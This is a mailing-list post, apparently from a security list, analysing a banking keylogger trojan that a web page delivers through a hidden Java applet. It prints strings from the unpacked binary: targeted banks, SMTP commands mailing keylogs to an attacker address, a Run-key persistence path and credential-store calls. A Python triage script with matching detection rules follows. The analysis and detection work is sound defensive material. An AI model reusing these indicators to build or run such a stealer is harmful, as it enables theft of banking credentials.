Message-ID: <402FC40D.752.65AE52B@localhost>
From: n.teusink at planet.nl (n.teusink@...net.nl)
Subject: Re: http://federalpolice.com:article872@...5686747

From the source of that page:

APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1

BlackBox.class is detected immediately by my virus scanner as ClassLoader/E, more 
info:
http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm

The javautil.zip appears to be an exe file renamed to zip. The exe is compressed with 
FSG.

Interesting pieces of output from strings on the decompressed exe:


----------------------------------------------BEGIN
HookerDll.Dll
Install
Uninstall
EDIT
%s\%s
WVS3
	\kgn.txt
Hooker.dll
Install
Uninstall
Westpac
bendigo
Bendigo
e-bendigo
e-Bendigo
commbank
Commonwealth
NetBank
Citibank
Bank of America
e-gold
e-bullion
e-Bullion
evocash
EVOCash
EVOcash
intgold
INTGold
paypal
PayPal
bankwest
Bank West
BankWest
National Internet Banking
cibc
CIBC
scotiabank
ScotiaBank
Scotia Bank
bank of montreal
Bank of Montreal
royalbank
Royal Bank
RoyalBank
tdwaterhouse
TD Canada Trust
TD Waterhouse
president's choice
President's Choice
President Choice
suncorpmetway
Suncorp
macquarie
Macquarie
INTgold
1mdc
1MDC
TD Waterhouse
goldmoney
GoldMoney
goldgrams
pecunix
Pecunix
Pecun!x
hyperwallet
HyperWallet
Wells Fargo
Bank One
Banesto
CAIXA
SunTrust
Sun Trust
Discover Card
Washington Mutual
Wachovia
desjardins
Chase
0+060F0
1$11161J1U1i1
2.2I2\2
3'3,3E3c3h3r3
4%42484>4D4J4P4V4\4b4h4n4t4z4
DATA
EHLO localhost
Subject: KeyLog from (%s)
MAIL FROM:<pentasatan@...l.ru>
RCPT TO:<pentasatan@...l.ru>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
open
pstorec.dll
PStoreCreateInstance
internet explorer
http://
wininetcachecredentials
Cookie:
----------------------------------------------END

I think you can draw your own conclusions about this file.

Niels
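
A triage sketch for the two observations in the message above (a .zip that is really an executable, and telling strings in the unpacked binary), added here as an example and not part of the original post. The rule labels, function names and sample bytes are assumptions constructed for illustration; the matched strings are taken from the quoted output.

```python
import re
import struct

# Rule labels are this example's own reading of the strings quoted in the post.
RULES = {
    "persistence": re.compile(rb"CurrentVersion\\Run", re.I),
    "smtp_exfil": re.compile(rb"^(EHLO|MAIL FROM:|RCPT TO:|DATA$)", re.I),
    "credential_store": re.compile(rb"pstorec\.dll|PStoreCreateInstance|wininetcachecredentials", re.I),
    "keylogging": re.compile(rb"KeyLog|Hook(er)?(Dll)?\.dll", re.I),
}

def sniff_type(data: bytes) -> str:
    """Identify a file by its magic bytes, ignoring its name."""
    if data[:4] in (b"PK\x03\x04", b"PK\x05\x06"):
        return "zip"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of PE header
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
    return "unknown"

def extension_mismatch(name: str, data: bytes) -> bool:
    """True when a .zip name hides content that is not a ZIP archive."""
    return name.lower().endswith(".zip") and sniff_type(data) != "zip"

def ascii_strings(data: bytes, min_len: int = 4):
    """Like `strings`: runs of printable ASCII at least min_len long."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)

def triage(data: bytes) -> dict:
    """Group extracted strings by the behaviour they suggest."""
    hits = {}
    for s in ascii_strings(data):
        for label, rx in RULES.items():
            if rx.search(s):
                hits.setdefault(label, []).append(s.decode())
    return hits

# Constructed sample: minimal MZ/PE header followed by a few of the post's strings.
SAMPLE = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 8
          + b"\x00".join([b"HookerDll.Dll", b"EHLO localhost", b"Subject: KeyLog from (%s)",
                          b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                          b"pstorec.dll", b"PStoreCreateInstance", b"Chase"]))

if __name__ == "__main__":
    print(sniff_type(SAMPLE), extension_mismatch("javautil.zip", SAMPLE))
    print(triage(SAMPLE))
```

A packed file such as the FSG-compressed one described here yields few useful strings until it is unpacked, so the triage step applies to the decompressed image.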

